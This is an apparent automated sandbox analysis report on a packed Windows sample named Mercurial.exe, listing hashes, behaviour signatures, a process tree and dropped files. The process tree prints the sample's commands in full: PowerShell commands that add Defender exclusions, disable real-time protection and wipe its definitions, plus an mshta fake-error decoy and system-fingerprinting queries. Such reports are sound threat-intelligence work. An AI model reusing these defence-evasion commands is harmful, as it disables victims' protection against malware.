Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250207-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/02/2025, 17:40

General

  • Target

    Mercurial.exe

  • Size

    9.8MB

  • MD5

    3bf880794834e8bcbbbf9060734acfd8

  • SHA1

    52339a5a36704004d492f5216e79a0568c90199d

  • SHA256

    0f9a723b42319e0b131ea7c1dda2907e7766937cc296840621be757d1be83532

  • SHA512

    9f782e3b383243ee26fd9eac9981f84a96f9820705b691c13f74e4a0c18cd06744618486988489113ae2da25df65dae590035dbcc2f85b43797432c9b6ff4cb5

  • SSDEEP

    196608:fsOOjmFQR4MVGFtwKPmF9mhAqaeGq8PHiFRV104:kKtM5KPm7mCeb8PHma4

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 16 IoCs
  • Obfuscated with Agile.Net obfuscator 11 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • UPX packed file 50 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Mercurial.exe
    "C:\Users\Admin\AppData\Local\Temp\Mercurial.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2336
    • C:\Users\Admin\AppData\Local\Temp\Mercurial.exe
      "C:\Users\Admin\AppData\Local\Temp\Mercurial.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4872
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Mercurial.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4236
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Mercurial.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4648
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4620
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5020
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:536
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4172
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4768
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:4008
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 1356
            5⤵
            • Program crash
            PID:4928
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The program has stopped working.', 0, 'Error 404:', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1728
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The program has stopped working.', 0, 'Error 404:', 0+16);close()"
          4⤵
            PID:2216
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4948
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4200
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4756
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1232
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4008 -ip 4008
      1⤵
        PID:1440

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        d28a889fd956d5cb3accfbaf1143eb6f

        SHA1

        157ba54b365341f8ff06707d996b3635da8446f7

        SHA256

        21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

        SHA512

        0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\VCRUNTIME140.dll

        Filesize

        106KB

        MD5

        4585a96cc4eef6aafd5e27ea09147dc6

        SHA1

        489cfff1b19abbec98fda26ac8958005e88dd0cb

        SHA256

        a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

        SHA512

        d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\_bz2.pyd

        Filesize

        48KB

        MD5

        554b7b0d0daca993e22b7d31ed498bc2

        SHA1

        ea7f1823e782d08a99b437c665d86fa734fe3fe4

        SHA256

        1db14a217c5279c106b9d55f440ccf19f35ef3a580188353b734e3e39099b13f

        SHA512

        4b36097eddd2c1d69ac98c7e98eebe7bb11a5117249ad36a99883732f643e21ecf58e6bea33b70974d600563dc0b0a30bead98bafb72537f8374b3d67979e60a

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\_ctypes.pyd

        Filesize

        58KB

        MD5

        d603c8bfe4cfc71fe5134d64be2e929b

        SHA1

        ff27ea58f4f5b11b7eaa1c8884eac658e2e9248b

        SHA256

        5ee40bcaab13fa9cf064ecae6fc0da6d236120c06fa41602893f1010efaa52fe

        SHA512

        fcc0dbfbe402300ae47e1cb2469d1f733a910d573328fe7990d69625e933988ecc21ab22f432945a78995129885f4a9392e1cee224d14e940338046f61abe361

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\_hashlib.pyd

        Filesize

        35KB

        MD5

        32df18692606ce984614c7efda2eec27

        SHA1

        86084e39ab0aadf0ecfb82ce066b7bf14152961e

        SHA256

        b7c9c540d54ab59c16936e1639c6565cd35a8ca625f31753e57db9cbd0ee0065

        SHA512

        679f8956370edc4dee32475d8440a2d2f9b6dd0edd0e033e49fed7834a35c7ed51ccde0995d19ed0a559a4383b99ae8c11e4e686902db12a2a5e0a3f2c0f4a9d

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\_lzma.pyd

        Filesize

        85KB

        MD5

        01629284f906c40f480e80104158f31a

        SHA1

        6ab85c66956856710f32aed6cdae64a60aea5f0f

        SHA256

        a201ec286b0233644ae62c6e418588243a3f2a0c5a6f556e0d68b3c747020812

        SHA512

        107a4e857dd78dd92be32911e3a574f861f3425e01ab4b1a7580ac799dc76122ce3165465d24c34ac7fc8f2810547ad72b4d4ba3de76d3d61ed9bf5b92e7f7d4

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\_queue.pyd

        Filesize

        25KB

        MD5

        4a313dc23f9d0a1f328c74dd5cf3b9ab

        SHA1

        494f1f5ead41d41d324c82721ab7ca1d1b72c062

        SHA256

        2163010bfde88a6cc15380516d31955935e243b7ad43558a89380bf5fe86337e

        SHA512

        42c712b758b35c0005b3528af586233298c2df4ed9f5133b8469bca9ec421ab151ce63f3929898c73d616cd9707594fa5f96d623fc150e214a4b2276c23c296e

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\_socket.pyd

        Filesize

        43KB

        MD5

        67897f8c3262aecb8c9f15292dd1e1f0

        SHA1

        74f1ef77dd3265846a504f98f2e2f080eadbf58a

        SHA256

        ddbfa852e32e20d67a0c3d718ce68e9403c858d5cad44ea6404aff302556aba7

        SHA512

        200b6570db2fbb2eac7f51cae8e16ffb89cd46d13fba94a7729a675f10f4432fc89a256fd6bd804feac528191bd116407fd58a0573487d905fc8fca022c1abba

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\_sqlite3.pyd

        Filesize

        56KB

        MD5

        230025cf18b0c20c5f4abba63d733ca8

        SHA1

        336248fde1973410a0746599e14485d068771e30

        SHA256

        30a3bc9ed8f36e3065b583d56503b81297f32b4744bff72dcf918407978ce332

        SHA512

        2c4d943c6587d28763cf7c21ad37cc4762674a75c643994b3e8e7c7b20576d5674cf700fdfaddc1a834d9bf034bf2f449d95351c236fde720505ccdd03369bb1

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\_ssl.pyd

        Filesize

        62KB

        MD5

        0d15b2fdfa03be76917723686e77823c

        SHA1

        efd799a4a5e4f9d15226584dd2ee03956f37bdaf

        SHA256

        2fc63abe576c0d5fe031cf7ee0e2f11d9c510c6dbacfc5dd2e79e23da3650ee8

        SHA512

        e21ab5ebe8b97243cf32ca9181c311978e203852847e4beb5e6ada487038c37dec18a2b683e11e420e05ace014aca2172b2dda15930bab944053843e25623227

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\base_library.zip

        Filesize

        1.7MB

        MD5

        c02b1b28775aa757d008b2b0e52a4943

        SHA1

        f5c12fa0eddb3a4127bd0866714bdcf10a7abead

        SHA256

        eb71c75ad9fa6aba6e8b793948a96029a190b612bb289c780621757d90c08577

        SHA512

        58ae35c802ef81da05e9aeef0f16e9b27d6391e9dffb8aa77ea8406497201766d9fd7834d40a167485f452f57b51066988afc344c733129d1e4fad78b8dcf1c5

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\blank.aes

        Filesize

        112KB

        MD5

        5cac06a13dd775728e5a644b065764e9

        SHA1

        08e3c414cf07f0fde51b33dbf7d029a6fd1dac8e

        SHA256

        a1c58a1004f144e94d6d09bcc55bed72388c92919b66009cbaaf18b221b2d51a

        SHA512

        bd301d5fa02f15a001a1185a62ea34aa7859d3b7665a022da069493a1e1dde9fe0a343430b31805382ce6d421a65589d3eea2f39297638ced7b6aee31228a753

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\blank.aes

        Filesize

        112KB

        MD5

        a3fa59c1e1bcff8ab8365ffb5fcce0ae

        SHA1

        41032c8d8566ec8bdad6c365facacf3024ec5aee

        SHA256

        5475b0a318795d9de9c1907d42ee1049291e0d820ca4f754de7e57400da758ff

        SHA512

        fb3d717a3df199a3bea130e17a03bb55e28fb99f1aefedbef04be2baf3d8bbb8bde382058282e33fa83e85f08e61e19e9397ec591ac6120e458d3a26c08f3a6d

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\bound.blank

        Filesize

        2.9MB

        MD5

        bbe3a4012c07b453de598bca5eef578e

        SHA1

        21e8519a067a37abd7d7e7421e90c11db44186dd

        SHA256

        cb4ef1a7384c7fa2f14128bfad0cf2aba90979a5f695f6056f69c8834c8e6948

        SHA512

        38ae7cfb26368c5a3895a37d62ded20f3b01c21b0f64545469f91a8f2f78d68856e017d18b1abfe8201f955b4fe164654fd58e5190d1c64c1d4365c605f784fa

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\libcrypto-1_1.dll

        Filesize

        1.1MB

        MD5

        bbc1fcb5792f226c82e3e958948cb3c3

        SHA1

        4d25857bcf0651d90725d4fb8db03ccada6540c3

        SHA256

        9a36e09f111687e6b450937bb9c8aede7c37d598b1cccc1293eed2342d11cf47

        SHA512

        3137be91f3393df2d56a3255281db7d4a4dccd6850eeb4f0df69d4c8dda625b85d5634fce49b195f3cc431e2245b8e9ba401baaa08778a467639ee4c1cc23d8d

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\libffi-8.dll

        Filesize

        29KB

        MD5

        08b000c3d990bc018fcb91a1e175e06e

        SHA1

        bd0ce09bb3414d11c91316113c2becfff0862d0d

        SHA256

        135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

        SHA512

        8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\libssl-1_1.dll

        Filesize

        204KB

        MD5

        ad0a2b4286a43a0ef05f452667e656db

        SHA1

        a8835ca75768b5756aa2445ca33b16e18ceacb77

        SHA256

        2af3d965863018c66c2a9a2d66072fe3657bbd0b900473b9bbdcac8091686ae1

        SHA512

        cceb5ec1dd6d2801abbacd6112393fecbf5d88fe52db86cfc98f13326c3d3e31c042b0cc180b640d0f33681bdd9e6a355dc0fbfde597a323c8d9e88de40b37c4

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\python311.dll

        Filesize

        1.6MB

        MD5

        9e985651962ccbccdf5220f6617b444f

        SHA1

        9238853fe1cff8a49c2c801644d6aa57ed1fe4d2

        SHA256

        3373ee171db8898c83711ec5067895426421c44f1be29af96efe00c48555472e

        SHA512

        8b8e68bbe71dcd928dbe380fe1a839538e7b8747733ba2fd3d421ba8d280a11ba111b7e8322c14214d5986af9c52ab0c75288bbb2a8b55612fb45836c56ddc36

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\select.pyd

        Filesize

        25KB

        MD5

        27703f9a7c7e90e049d5542fb7746988

        SHA1

        bc9c6f5271def4cc4e9436efa00f231707c01a55

        SHA256

        fcc744cfccc1c47f6f918e66cfc1b73370d2cecdb776984fabb638745ebe3a38

        SHA512

        0875ad48842bbac73e59d4b0b5d7083280bde98336c8856160493cc63f7c3a419f4471f19c8537e5c8515e194c6604f9efa07d9d9af5def2f374406d316436a8

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\sqlite3.dll

        Filesize

        610KB

        MD5

        08ce33649d6822ff0776ede46cc65650

        SHA1

        941535dabdb62c7ca74c32f791d2f4b263ec7d48

        SHA256

        48f50e8a693f3b1271949d849b9a70c76acaa4c291608d869efe77de1432d595

        SHA512

        8398e54645093e3f169c0b128cbeda3799d905173c9cb9548962ecbaf3d305620f0316c7c3f27077b148b8f6d3f6146b81c53b235f04ac54668dab05b929d52f

      • C:\Users\Admin\AppData\Local\Temp\_MEI23362\unicodedata.pyd

        Filesize

        295KB

        MD5

        f86f9b7eb2cb16fb815bb0650d9ef452

        SHA1

        b9e217146eb6194fc38923af5208119286c365ad

        SHA256

        b37d56ad48a70b802fb337d721120d753270dbda0854b1bfb600893fb2ce4e7a

        SHA512

        6c448f6d6c069ba950c555529557f678dfd17c748b2279d5eec530d7eb5db193aa1ca18dd3ce9f5220e8681a0e50b00d7de93c6744476c0e1872dafd9d5de775

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mmpqunlm.5qr.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\bound.exe

        Filesize

        3.2MB

        MD5

        a9477b3e21018b96fc5d2264d4016e65

        SHA1

        493fa8da8bf89ea773aeb282215f78219a5401b7

        SHA256

        890fd59af3370e2ce12e0d11916d1ad4ee9b9c267c434347dbed11e9572e8645

        SHA512

        66529a656865400fe37d40ae125a1d057f8be5aa17da80d367ebbe1a9dcea38f5174870d0dc5b56771f6ca5a13e2fad22d803f5357f3ef59a46e3bdf0cc5ee9c

      • memory/4008-131-0x00000000061E0000-0x000000000632A000-memory.dmp

        Filesize

        1.3MB

      • memory/4008-103-0x0000000000980000-0x0000000000CBA000-memory.dmp

        Filesize

        3.2MB

      • memory/4008-133-0x0000000005BF0000-0x0000000005C20000-memory.dmp

        Filesize

        192KB

      • memory/4008-132-0x0000000006330000-0x0000000006446000-memory.dmp

        Filesize

        1.1MB

      • memory/4008-123-0x0000000005850000-0x00000000058BE000-memory.dmp

        Filesize

        440KB

      • memory/4008-124-0x00000000058D0000-0x00000000058EE000-memory.dmp

        Filesize

        120KB

      • memory/4008-125-0x0000000005910000-0x0000000005946000-memory.dmp

        Filesize

        216KB

      • memory/4008-126-0x0000000005950000-0x000000000595E000-memory.dmp

        Filesize

        56KB

      • memory/4008-127-0x0000000005970000-0x000000000597E000-memory.dmp

        Filesize

        56KB

      • memory/4008-119-0x0000000005760000-0x0000000005780000-memory.dmp

        Filesize

        128KB

      • memory/4008-120-0x0000000005810000-0x0000000005830000-memory.dmp

        Filesize

        128KB

      • memory/4008-121-0x0000000005830000-0x0000000005840000-memory.dmp

        Filesize

        64KB

      • memory/4008-122-0x0000000005840000-0x0000000005854000-memory.dmp

        Filesize

        80KB

      • memory/4008-118-0x0000000005620000-0x000000000563C000-memory.dmp

        Filesize

        112KB

      • memory/4008-117-0x0000000005610000-0x000000000561A000-memory.dmp

        Filesize

        40KB

      • memory/4008-115-0x0000000005570000-0x0000000005602000-memory.dmp

        Filesize

        584KB

      • memory/4008-113-0x0000000005C20000-0x00000000061C4000-memory.dmp

        Filesize

        5.6MB

      • memory/4872-47-0x00007FFFCBCD0000-0x00007FFFCBCF3000-memory.dmp

        Filesize

        140KB

      • memory/4872-33-0x00007FFFD5110000-0x00007FFFD511F000-memory.dmp

        Filesize

        60KB

      • memory/4872-148-0x00007FFFCF020000-0x00007FFFCF034000-memory.dmp

        Filesize

        80KB

      • memory/4872-44-0x00007FFFD16C0000-0x00007FFFD16D9000-memory.dmp

        Filesize

        100KB

      • memory/4872-116-0x00007FFFCBCD0000-0x00007FFFCBCF3000-memory.dmp

        Filesize

        140KB

      • memory/4872-61-0x00007FFFCBB60000-0x00007FFFCBB8E000-memory.dmp

        Filesize

        184KB

      • memory/4872-79-0x00007FFFD16C0000-0x00007FFFD16D9000-memory.dmp

        Filesize

        100KB

      • memory/4872-80-0x00007FFFCB5F0000-0x00007FFFCB70C000-memory.dmp

        Filesize

        1.1MB

      • memory/4872-50-0x00007FFFBBFC0000-0x00007FFFBC130000-memory.dmp

        Filesize

        1.4MB

      • memory/4872-73-0x00007FFFCF260000-0x00007FFFCF28D000-memory.dmp

        Filesize

        180KB

      • memory/4872-74-0x00007FFFD0350000-0x00007FFFD035D000-memory.dmp

        Filesize

        52KB

      • memory/4872-53-0x00007FFFCF2B0000-0x00007FFFCF2C9000-memory.dmp

        Filesize

        100KB

      • memory/4872-70-0x00007FFFCF020000-0x00007FFFCF034000-memory.dmp

        Filesize

        80KB

      • memory/4872-56-0x00007FFFD17A0000-0x00007FFFD17AD000-memory.dmp

        Filesize

        52KB

      • memory/4872-65-0x00007FFFBBC40000-0x00007FFFBBFB9000-memory.dmp

        Filesize

        3.5MB

      • memory/4872-66-0x00007FFFCB7D0000-0x00007FFFCB888000-memory.dmp

        Filesize

        736KB

      • memory/4872-32-0x00007FFFD0150000-0x00007FFFD0173000-memory.dmp

        Filesize

        140KB

      • memory/4872-41-0x00007FFFCF260000-0x00007FFFCF28D000-memory.dmp

        Filesize

        180KB

      • memory/4872-67-0x00007FFFD0150000-0x00007FFFD0173000-memory.dmp

        Filesize

        140KB

      • memory/4872-64-0x00007FFFBC490000-0x00007FFFBCA79000-memory.dmp

        Filesize

        5.9MB

      • memory/4872-136-0x00007FFFBC490000-0x00007FFFBCA79000-memory.dmp

        Filesize

        5.9MB

      • memory/4872-150-0x00007FFFCB5F0000-0x00007FFFCB70C000-memory.dmp

        Filesize

        1.1MB

      • memory/4872-161-0x00007FFFBBC40000-0x00007FFFBBFB9000-memory.dmp

        Filesize

        3.5MB

      • memory/4872-160-0x00007FFFCBB60000-0x00007FFFCBB8E000-memory.dmp

        Filesize

        184KB

      • memory/4872-159-0x00007FFFD17A0000-0x00007FFFD17AD000-memory.dmp

        Filesize

        52KB

      • memory/4872-158-0x00007FFFCF2B0000-0x00007FFFCF2C9000-memory.dmp

        Filesize

        100KB

      • memory/4872-157-0x00007FFFBBFC0000-0x00007FFFBC130000-memory.dmp

        Filesize

        1.4MB

      • memory/4872-156-0x00007FFFCBCD0000-0x00007FFFCBCF3000-memory.dmp

        Filesize

        140KB

      • memory/4872-155-0x00007FFFD16C0000-0x00007FFFD16D9000-memory.dmp

        Filesize

        100KB

      • memory/4872-154-0x00007FFFCF260000-0x00007FFFCF28D000-memory.dmp

        Filesize

        180KB

      • memory/4872-26-0x00007FFFBC490000-0x00007FFFBCA79000-memory.dmp

        Filesize

        5.9MB

      • memory/4872-153-0x00007FFFD5110000-0x00007FFFD511F000-memory.dmp

        Filesize

        60KB

      • memory/4872-152-0x00007FFFD0150000-0x00007FFFD0173000-memory.dmp

        Filesize

        140KB

      • memory/4872-151-0x00007FFFCB7D0000-0x00007FFFCB888000-memory.dmp

        Filesize

        736KB

      • memory/4872-149-0x00007FFFD0350000-0x00007FFFD035D000-memory.dmp

        Filesize

        52KB

      • memory/5020-89-0x000002149D260000-0x000002149D282000-memory.dmp

        Filesize

        136KB